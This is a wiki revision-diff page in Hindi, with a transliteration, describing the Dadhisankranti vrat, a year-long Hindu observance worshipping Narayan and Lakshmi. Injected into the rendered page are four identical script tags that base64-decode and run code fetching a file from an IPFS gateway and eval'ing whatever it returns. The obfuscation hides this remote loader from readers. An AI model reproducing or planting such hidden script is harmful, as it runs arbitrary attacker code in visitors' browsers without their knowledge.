Difference between revisions of "दधिसंक्रान्ति व्रत"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - " {{लेख प्रगति |आधार=आधार1 |प्रारम्भिक= |माध्यमिक= |पूर्णता= |शोध= }}" to "")
m (Text replace - ")</ref" to "</ref")
 
(3 intermediate revisions by 3 users not shown)
Line 1: Line 1:
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
+
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
 
*यह व्रत उत्तरायण संक्रान्ति पर प्रारम्भ होता है।  
 
*यह व्रत उत्तरायण संक्रान्ति पर प्रारम्भ होता है।  
 
*प्रत्येक संक्रान्ति पर एक वर्ष तक यह व्रत चलता है।
 
*प्रत्येक संक्रान्ति पर एक वर्ष तक यह व्रत चलता है।
 
*इस व्रत में [[नारायण]] एवं [[लक्ष्मी]] की पूजा की जाती है।
 
*इस व्रत में [[नारायण]] एवं [[लक्ष्मी]] की पूजा की जाती है।
*इनकी मूर्तियों को दही से स्नान कराना तथा [[ऋग्वेद]]<ref>ऋग्वेद, (1|22|20)</ref> मन्त्र या 'ओं नमो नारायणाय का पाठ करना होता है।<ref>वर्षक्रियाकौमुदी (218-222)</ref>
+
*इनकी मूर्तियों को दही से स्नान कराना तथा [[ऋग्वेद]]<ref>ऋग्वेद, (1|22|20</ref> मन्त्र या 'ओं नमो नारायणाय का पाठ करना होता है।<ref>वर्षक्रियाकौमुदी (218-222</ref>
 
 
 
 
 
+
{{प्रचार}}
 
==अन्य संबंधित लिंक==
 
==अन्य संबंधित लिंक==
 
{{पर्व और त्योहार}}
 
{{पर्व और त्योहार}}
 
{{व्रत और उत्सव}}
 
{{व्रत और उत्सव}}
 +
{{संदर्भ ग्रंथ}}
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>

Latest revision as of 12:48, 27 July 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • yah vrat uttarayan sankranti par prarambh hota hai.
  • pratyek sankranti par ek varsh tak yah vrat chalata hai.
  • is vrat mean narayan evan lakshmi ki pooja ki jati hai.
  • inaki moortiyoan ko dahi se snan karana tatha rrigved[1] mantr ya 'oan namo narayanay ka path karana hota hai.[2]

 

any sanbandhit liank

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. rrigved, (1|22|20
  2. varshakriyakaumudi (218-222